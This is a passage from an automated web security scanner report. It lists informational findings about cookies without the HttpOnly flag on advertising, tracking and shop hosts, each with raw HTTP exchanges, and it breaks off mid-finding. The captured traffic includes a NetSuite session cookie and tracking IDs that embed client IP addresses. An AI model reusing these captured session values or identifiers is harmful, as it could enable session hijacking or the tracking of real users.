The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554 HTTP/1.1
Host: b.dclick.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:32 GMT
Content-Type: application/x-netgravity
Connection: close
Set-Cookie: NGUserID=5f831c50-23276-1303741232-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Pragma: max-age=0
Set-Cookie: NGUserID=5f831c50-23276-1303741232-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
Content-Length: 0
Cache-control: no-cache
Location: http://i.dclick.ru/dot.gif
AdServer: ads1.imho.ru:9678:1
P3P: policyref="http://front2.imho.ru/w3c/policy.xml", CP="NON CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT DEM LOC"
Expires: Mon, 25 Apr 2011 14:20:31 GMT

17.74. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

17.75. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
17.76. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

17.77. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0

17.78. http://bw.pronto.ru/brick/5/167/36/30/125/&rnd=538045407  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/125/&rnd=538045407

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/125/&rnd=538045407 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835aac8a9; expires=Thu, 19-Apr-2012 14:21:14 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3634

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.79. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/24/&rnd=252896795

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/24/&rnd=252896795 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835764628; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3746

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.80. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/26/&rnd=556115021

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/26/&rnd=556115021 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576afa9; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3630

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.81. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/28/&rnd=128924368

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/28/&rnd=128924368 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b45ff; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);
17.82. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/29/&rnd=443104168

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/29/&rnd=443104168 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b76a4; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);
17.83. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/37/&rnd=179025170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/37/&rnd=179025170 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583576b38c; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.84. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brick/5/167/36/30/44/&rnd=3108367

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brick/5/167/36/30/44/&rnd=3108367 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db583577059f; expires=Thu, 19-Apr-2012 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 2774

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.85. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/138/29/&rnd=808462191

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/138/29/&rnd=808462191 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357ab1f6; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);
17.86. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/236/49/&rnd=44849087

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/236/49/&rnd=44849087 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357e2452; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 3518

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.87. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/30/15/&rnd=555318316

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/30/15/&rnd=555318316 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db58357b862a; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 10059

function bw_utf8_decode ( str_data ) { var tmp_arr = [], i = 0, ac = 0, c1 = 0, c2 = 0, c3 = 0; str_data += ''; while ( i < str_data.length ) { c1 = str_data.charCodeAt(i); if (c1 < 128) { tmp_arr[ac+
...[SNIP]...
17.88. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bw.pronto.ru
Path:   /brickgrid/5/167/36/30/31/16/&rnd=189356183

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brickgrid/5/167/36/30/31/16/&rnd=189356183 HTTP/1.1
Host: bw.pronto.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: PHP/5.3.6
P3P: policyref="http://bw.pronto.ru/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI STA"
Set-Cookie: bwuid=bw_4db5835767516; expires=Wed, 25-May-2011 14:21:11 GMT; path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Length: 36

setTimeout('document.close();',100);
17.89. https://checkout.netsuite.com/s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

17.90. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

